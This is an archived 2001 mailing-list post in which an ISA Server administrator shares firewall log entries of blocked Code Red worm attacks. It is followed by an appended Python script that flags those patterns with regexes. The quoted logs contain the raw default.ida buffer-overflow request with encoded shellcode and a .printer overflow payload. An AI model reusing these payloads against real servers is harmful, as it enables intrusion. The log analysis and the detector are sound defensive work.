RE: FW: Alert: New version of Code Red, XXXX

  • From: "Michael Jankowski" <skyjumpr@xxxxxxxxxxx>
  • To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
  • Date: Sun, 5 Aug 2001 11:42:46 -0500

Wow, don't know what happened to those last emails.

After a few days of portscans (all successfully blocked) I finally
started getting Code Red attacks. Some interesting info on the attacks.
A few of the source IPs have been pretty thorough about hitting every
possible combination in the ObjectName field. Regardless of their
configuration all attempts have been blocked.

From a few of the log entries - Initial portion of ObjectName field
***************************************************************************
http://www.worm.com/default.ida     
http://207.225.151.2/default.ida        ISA external ip address
http://207.225.151.1/default.ida        ISA external ip address
http://TANIS/default.ida                   an internal web server name
(not sure how that was gotten. Although, I was in the process of setting
up a new site and IPs (ISAs and the web servers) around the time some
of the requests hit). ????


This is the log entry of a standard Code Red
***************************************************

207.91.144.219, anonymous, -, N, 8/5/2001, 9:46:00, W3ReverseProxy,
PALIN, -, www.worm.com, -, 0, 3966, 4039, 0, -, TCP, GET,
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u
6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u
8b00%u531b%u53ff%u0078%u0000%u00=a, -, -, 12202, 0x0, Default rule, -


Check out the end of the ObjectName field in this one (/NULL.printer).
Not a standard Code Red, but it looks like they attempt a buffer overrun.
***************************************************************************

216.29.225.188, anonymous, -, N, 8/5/2001, 10:23:34, W3ReverseProxy,
PALIN, -,
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ3ÃÂÂÃââ@`3ÃÂ$ÃÃÃÃÂÂÂ1Åj,
 -,
0, 80, 1182, 0, -, TCP, GET,
http://ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ;
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ3ÃÂÂÃââ@`3ÃÂ$ÃÃÃÃÂÂÂ
1Åj/NULL.printer, -, -, 12202, 0x0, Default rule, -



Michael

"Never attribute to malice that which can be adequately explained by
stupidity." Hanlon's Razor 
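As an added example (not code from the post or from ISA Server), a Python script that parses log lines in the W3ReverseProxy layout shown above and flags the two patterns described in the message: the Code Red default.ida request with its long N filler and %u-encoded words, and an oversized path ending in /NULL.printer. It also lists source addresses that cycle through several ObjectName hosts, as the post reports. The sample lines, their TEST-NET addresses and the field positions are constructed assumptions modeled on the entries in the post.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit
# Constructed sample lines in the W3ReverseProxy layout the post shows; assumed
# field order: client IP at 0, destination host at 9, URL at 18, result at 21.
IDA_QUERY = "N" * 224 + "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
TAIL = ", -, -, 12202, 0x0, Default rule, -"
SAMPLE_LOG = [
    "203.0.113.50, anonymous, -, N, 8/5/2001, 9:46:00, W3ReverseProxy, PALIN, -, "
    "www.worm.com, -, 0, 3966, 4039, 0, -, TCP, GET, "
    "http://www.worm.com/default.ida?" + IDA_QUERY + "=a" + TAIL,
    "203.0.113.50, anonymous, -, N, 8/5/2001, 9:46:07, W3ReverseProxy, PALIN, -, "
    "192.0.2.2, -, 0, 3966, 4039, 0, -, TCP, GET, "
    "http://192.0.2.2/default.ida?" + IDA_QUERY + "=a" + TAIL,
    "203.0.113.77, anonymous, -, N, 8/5/2001, 10:23:34, W3ReverseProxy, PALIN, -, "
    "192.0.2.2, -, 0, 80, 1182, 0, -, TCP, GET, "
    "http://192.0.2.2/" + "A" * 420 + "/NULL.printer" + TAIL,
    "198.51.100.7, anonymous, -, N, 8/5/2001, 10:30:00, W3ReverseProxy, PALIN, -, "
    "www.example.net, -, 0, 300, 512, 0, -, TCP, GET, "
    "http://www.example.net/index.html" + TAIL,
]
# Code Red: /default.ida followed by a long N/X filler and %u-encoded words.
CODE_RED_RE = re.compile(r"/default\.ida\?[NX]{100,}.*%u[0-9a-f]{4}", re.I)
# Oversized path ending in .printer (the second entry in the post).
PRINTER_RE = re.compile(r"\.printer$", re.I)

def parse_line(line):
    """Split one log entry into the fields this script uses."""
    f = [x.strip() for x in line.split(", ")]
    return {"src": f[0], "host": f[9], "url": f[18], "result": f[21]}

def classify(url):
    """Return a label for a known overflow pattern, or None for ordinary traffic."""
    if CODE_RED_RE.search(url):
        return "code-red-ida-overflow"
    path = urlsplit(url).path
    if PRINTER_RE.search(path) and len(path) > 255:
        return "printer-isapi-overflow"
    return None

def analyze(lines):
    """Flag overflow attempts and sources that sweep several ObjectName hosts."""
    hits, hosts_by_src = [], defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        kind = classify(rec["url"])
        if kind:
            hits.append((rec["src"], kind, rec["host"], rec["result"]))
        hosts_by_src[rec["src"]].add(urlsplit(rec["url"]).hostname)
    sweepers = {s: sorted(h) for s, h in hosts_by_src.items() if len(h) > 1}
    return hits, sweepers
```

Run `analyze` over a real export to get the flagged entries plus the sources that tried more than one host name in the request URL.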


-----Original Message-----
From: Tim Buenz [mailto:tbuenz@xxxxxxxxxxxxxxxxxxxxxxxxxxxx] 
Sent: Sunday, August 05, 2001 11:25 AM
To: [ISAserver.org Discussion List]
Subject: [isalist] RE: FW: Alert: New version of Code Red, XXXX
